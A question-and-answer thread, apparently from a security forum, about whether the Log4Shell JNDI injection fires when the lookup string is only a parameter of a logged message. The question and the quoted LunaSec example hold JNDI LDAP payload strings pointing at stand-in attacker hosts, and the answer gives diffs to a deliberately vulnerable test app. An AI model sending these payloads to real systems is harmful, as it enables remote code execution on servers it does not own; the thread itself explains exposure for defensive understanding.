4

Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?

For example, if the code contains:

paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug("Request: {}", paramGivenFromOutside);

Will this code be affected by the exploit?

Philipp
  • 48,867
  • 8
  • 127
  • 157
Lefteris E
  • 143
  • 2

1 Answers1

5

Will this code be affected by the exploit?

Yes.

From the LunaSec's announcement of the RCE, the line that triggers the exploit uses a parameter:[1]

// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
log.info("Request User Agent: {}", userAgent);

You can test this yourself using their reproduction steps. The example vulnerable app they link to works with both string concatenation and a parameter.[2]

You can apply this diff to that test it:

diff --git a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
index aab70c7..5b22584 100644
--- a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
+++ b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
@@ -15,7 +15,7 @@ public class MainController {
 
     @GetMapping("/")
     public String index(@RequestHeader("X-Api-Version") String apiVersion) {
-        logger.info("Received a request for API version " + apiVersion);
+        logger.info("Received a request for API version {}", apiVersion);
         return "Hello, world!";
     }

It will also work as the full string:

diff --git a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
index aab70c7..c83e07e 100644
--- a/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
+++ b/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java
@@ -15,7 +15,7 @@ public class MainController {
 
     @GetMapping("/")
     public String index(@RequestHeader("X-Api-Version") String apiVersion) {
-        logger.info("Received a request for API version " + apiVersion);
+        logger.info("{}", apiVersion);
         return "Hello, world!";
     }
Whymarrh
  • 312
  • 3
  • 17